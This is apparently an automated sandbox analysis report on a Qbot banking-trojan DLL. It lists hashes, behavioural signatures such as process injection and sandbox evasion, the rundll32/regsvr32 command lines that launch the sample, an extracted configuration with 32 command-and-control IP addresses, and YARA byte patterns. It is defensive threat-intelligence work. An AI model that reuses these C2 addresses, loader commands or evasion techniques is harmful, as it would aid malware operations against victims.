Edit tour

Windows Analysis Report
diatomaceous.dat.dll

Overview

General Information

Sample Name:	diatomaceous.dat.dll
Analysis ID:	719511
MD5:	2e7f90e0c595d88d28f9fd979ccfcf33
SHA1:	8ff540ba601429c2ee0a444b0d2ec2650d178d23
SHA256:	e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
Tags:	dll
Infos:

Detection

Qbot

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Qbot

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: Execute DLL with spoofed extension

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Allocates memory in foreign processes

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Registers a DLL

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

PE file overlay found

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1540 cmdline: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)

conhost.exe (PID: 1592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5832 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5792 cmdline: rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 4744 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

regsvr32.exe (PID: 5828 cmdline: regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

wermgr.exe (PID: 4648 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

rundll32.exe (PID: 5820 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

wermgr.exe (PID: 3668 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)

rundll32.exe (PID: 1228 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "BB", "Campaign": "1664535088", "Version": "403.902", "C2 list": ["41.107.71.201:443", "105.101.230.16:443", "105.108.239.60:443", "196.64.227.5:8443", "41.249.158.221:995", "134.35.14.5:443", "113.170.117.251:443", "187.193.219.248:443", "122.166.244.116:443", "154.237.129.123:995", "41.98.229.81:443", "186.48.199.243:995", "102.156.3.13:443", "41.97.190.189:443", "197.207.191.164:443", "105.184.14.132:995", "196.207.146.151:443", "105.158.113.15:443", "196.89.42.89:995", "86.98.156.229:993", "177.174.119.195:32101", "81.156.194.147:2078", "80.253.189.55:443", "197.49.175.67:995", "177.45.78.52:993", "89.187.169.77:443", "196.92.59.242:995", "41.13.200.19:443", "41.97.195.237:443", "92.191.56.11:2222", "154.70.53.202:443", "210.186.37.98:50002"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000007.00000000.329030667.0000000002520000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000005.00000003.323262277.0000000003000000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000004.00000003.322963828.0000000004960000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000003.00000002.329921401.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000003.00000003.322721841.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000007.00000002.331498854.0000000002520000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000005.00000002.330442684.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000009.00000000.329591797.0000000002BC0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000004.00000002.330333126.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000008.00000002.332320278.0000000002580000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
00000008.00000000.329252836.0000000002580000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.rundll32.exe.4af0000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
4.2.rundll32.exe.4af0000.1.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
4.2.rundll32.exe.4af0000.1.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
3.3.regsvr32.exe.2b70000.2.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
3.3.regsvr32.exe.2b70000.2.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0xf74f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
3.3.regsvr32.exe.2b70000.2.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1aa14:$a4: %u;%u;%u; 0x1af50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1add8:$a6: %u&%s&%u 0x74c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x7804:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x1b30:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x1587:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xb0ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
9.0.wermgr.exe.2bc0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
9.0.wermgr.exe.2bc0000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
9.0.wermgr.exe.2bc0000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
8.2.wermgr.exe.2580000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
8.2.wermgr.exe.2580000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
8.2.wermgr.exe.2580000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
7.0.wermgr.exe.2520000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.0.wermgr.exe.2520000.0.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
7.0.wermgr.exe.2520000.0.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ca14:$a4: %u;%u;%u; 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1cdd8:$a6: %u&%s&%u 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
5.3.rundll32.exe.3000000.1.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
5.3.rundll32.exe.3000000.1.raw.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
5.3.rundll32.exe.3000000.1.raw.unpack	Windows_Trojan_Qbot_3074a8d4	unknown	unknown	0x1ba14:$a4: %u;%u;%u; 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x 0x1bdd8:$a6: %u&%s&%u 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
9.0.wermgr.exe.2bc0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
9.0.wermgr.exe.2bc0000.0.unpack	Windows_Trojan_Qbot_92c67a6d	unknown	unknown	0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
